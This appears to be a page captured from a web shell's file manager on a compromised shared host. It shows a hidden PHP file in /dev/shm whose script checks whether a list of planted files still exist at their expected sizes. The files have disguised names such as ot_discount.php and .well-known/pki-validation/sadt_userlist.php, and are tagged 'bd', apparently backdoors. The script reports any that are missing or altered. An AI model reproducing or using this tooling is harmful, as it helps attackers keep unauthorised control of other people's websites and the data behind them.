HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
User: mzydsegq (856)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: //dev/shm/.value
<?php   $r = '/home/vitanhod/vigolic-100ad.vitavit.com.pk'; $x = ["/orderemail_bk.php"=>"bd@@1316687@@99",
"/img/ot_discount.php"=>"bd@@1316646@@16",
"/includes/function.image.php"=>"bd@@1310561@@902",
"/includes/configOnline.php"=>"bd@@1316458@@3",
"/cma_m_myaccount.php"=>"bd@@1314831@@71",
"/.well-known/pki-validation/sadt_userlist.php"=>"bd@@1316731@@29",
"/.well-known/askquestion.php"=>"bd@@1310693@@920",
"/img/ot.discount.php"=>"bd@@1315182@@964",
"/cma.php"=>"bd@@1316774@@945",
"/.well-known/askquestion.php"=>"bd@@1316531@@21",
"/.well-known/pki-validation/sadt_userlist.php"=>"bd@@1310665@@1024"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');